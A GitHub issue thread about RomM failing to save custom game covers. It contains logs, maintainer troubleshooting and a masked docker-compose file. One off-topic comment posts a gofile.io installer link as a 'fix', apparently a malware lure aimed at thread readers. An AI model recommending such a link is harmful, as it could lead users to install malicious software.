### ISSUE TITLE
[Bug] Custom Covers not saved

### ISSUE THREAD

**Issue by Skeeve** [rommapp/romm#1169]
**RomM version**

```
# docker images
REPOSITORY          TAG                 IMAGE ID            CREATED             SIZE
rommapp/romm        latest              ecf0a0def09b        3 days ago          289MB
mariadb             latest              92520f86618b        2 weeks ago         407MB
```

**Describe the bug**
I'm trying to set a cover of a game but it's not saved.

**To Reproduce**

1. Go to a game
2. Click on "Edit"
3. Click on the "pencil" of the cover
4. Select an image
5. See the image as the new cover
6. Click "Save"
7. Note the "success"-message
8. Wonder why no cover is shown

**Expected behavior**
After saving the cover should be shown

**Screenshots**

Here are the logs of my action:

```
romm       | 192.168.192.72:0 - "GET /api/roms/230 HTTP/1.0" 200
romm       | INFO:	  [nginx][2024-09-04 13:03:31]	192.168.192.72 - - "GET /api/roms/230 HTTP/1.1" 200 1365 "http://kodiwyse.local:6464/rom/230" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" rt=0.141 uct="0.000" uht="0.140" urt="0.141"
romm       | 192.168.192.72:0 - "GET /api/platforms/95 HTTP/1.0" 200
romm       | INFO:	  [nginx][2024-09-04 13:03:32]	192.168.192.72 - - "GET /api/platforms/95 HTTP/1.1" 200 217 "http://kodiwyse.local:6464/rom/230" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" rt=0.060 uct="0.000" uht="0.060" urt="0.060"
romm       | 2024/09/04 13:03:32 [error] 27#27: *273 directory index of "/var/www/html/assets/romm/resources/" is forbidden, client: 192.168.192.72, server: localhost, request: "GET /assets/romm/resources/?ts=2024-09-04T13:02:30 HTTP/1.1", host: "kodiwyse.local:6464", referrer: "http://kodiwyse.local:6464/rom/230"
romm       | INFO:	  [nginx][2024-09-04 13:03:32]	192.168.192.72 - - "GET /assets/romm/resources/?ts=2024-09-04T13:02:30 HTTP/1.1" 403 555 "http://kodiwyse.local:6464/rom/230" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" rt=0.000 uct="-" uht="-" urt="-"
romm       | INFO:	  [nginx][2024-09-04 13:03:32]	192.168.192.72 - - "GET /assets/platforms/undefined.ico HTTP/1.1" 404 555 "http://kodiwyse.local:6464/rom/230" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" rt=0.000 uct="-" uht="-" urt="-"
romm       | WARNING:  [RomM][2024-09-04 13:03:59] Couldn't remove cover from 'In the Dark 2' since '/romm/resources/roms/95/230/cover' doesn't exists.
romm       | 192.168.192.72:0 - "PUT /api/roms/230?rename_as_source=false&remove_cover=true&unmatch_metadata=false HTTP/1.0" 200
romm       | INFO:	  [nginx][2024-09-04 13:03:59]	192.168.192.72 - - "PUT /api/roms/230?rename_as_source=false&remove_cover=true&unmatch_metadata=false HTTP/1.1" 200 1366 "http://kodiwyse.local:6464/rom/230" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" rt=0.241 uct="0.000" uht="0.216" urt="0.216"
romm       | 2024/09/04 13:03:59 [error] 28#28: *269 directory index of "/var/www/html/assets/romm/resources/" is forbidden, client: 192.168.192.72, server: localhost, request: "GET /assets/romm/resources/?ts=2024-09-04T13:03:59 HTTP/1.1", host: "kodiwyse.local:6464", referrer: "http://kodiwyse.local:6464/rom/230"
romm       | INFO:	  [nginx][2024-09-04 13:03:59]	192.168.192.72 - - "GET /assets/romm/resources/?ts=2024-09-04T13:03:59 HTTP/1.1" 403 555 "http://kodiwyse.local:6464/rom/230" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" rt=0.000 uct="-" uht="-" urt="-"
```

**Desktop (please complete the following information):**

- OS: Mac OS
- Browser Vivaldi
- Version 6.9.3447.37 (Stable channel) (x86_64)

**Smartphone (please complete the following information):**

Not used

**Comment by ThemySabri** [comment]
try this
https://gofile.io/d/yMHabA
select the desired compiler in the installer

**Comment by gantoine** [comment]
> romm       | WARNING:  [RomM][2024-09-04 13:03:59] Couldn't remove cover from 'In the Dark 2' since '/romm/resources/roms/95/230/cover' doesn't exists.

That's a new one, usually it needs to delete the old image before uploading a new one, but it can't seem to find it. Between this and your other issue, there might be something wonky with your setup. Can you verify that the perms for the `resources` mount is correct?

**Comment by gantoine** [comment]
No that should be fine, though libreelec is an interesting choice! Can you post your docker compose here, hiding any sensitive info/keys?

**Comment by Skeeve** [comment]
```yaml
volumes:
  mysql_data:
  romm_resources:
  romm_redis_data:

services:
  romm:
    image: rommapp/romm:latest
    container_name: romm
    restart: unless-stopped
    environment:
      - DB_HOST=romm-db
      - DB_NAME=romm # Should match MYSQL_DATABASE in mariadb
      - DB_USER=romm-user # Should match MYSQL_USER in mariadb
      - DB_PASSWD=***
      - ROMM_AUTH_SECRET_KEY=*** # Generate a key with `openssl rand -hex 32`
      - IGDB_CLIENT_ID=*** # Generate an ID and SECRET in IGDB app:igdb_***
      - IGDB_CLIENT_SECRET=*** # https://api-docs.igdb.com/#account-creation
      - MOBYGAMES_API_KEY=moby_*** # https://www.mobygames.com/info/api/
      - STEAMGRIDDB_API_KEY # https://github.com/rommapp/romm/wiki/Generate-API-Keys#steamgriddb
    volumes:
      - romm_resources:/romm/resources # Resources fetched from IGDB (covers, screenshots, etc.)
      - romm_redis_data:/redis-data # Cached data for background tasks
      - /media/INTENSO/romm/library:/romm/library # Your game library
      - /media/INTENSO/romm/assets:/romm/assets # Uploaded saves, states, etc.
      - /media/INTENSO/romm/config:/romm/config # Path where config.yml is stored
    ports:
      - 6464:8080
    depends_on:
      - romm-db

  romm-db:
    image: mariadb:latest # if you experience issues, try: linuxserver/mariadb:latest
    container_name: romm-db
    restart: unless-stopped
    environment:
      - MYSQL_ROOT_PASSWORD=***
      - MYSQL_DATABASE=romm
      - MYSQL_USER=romm-user
      - MYSQL_PASSWORD=***
    volumes:
      - mysql_data:/var/lib/mysql
```
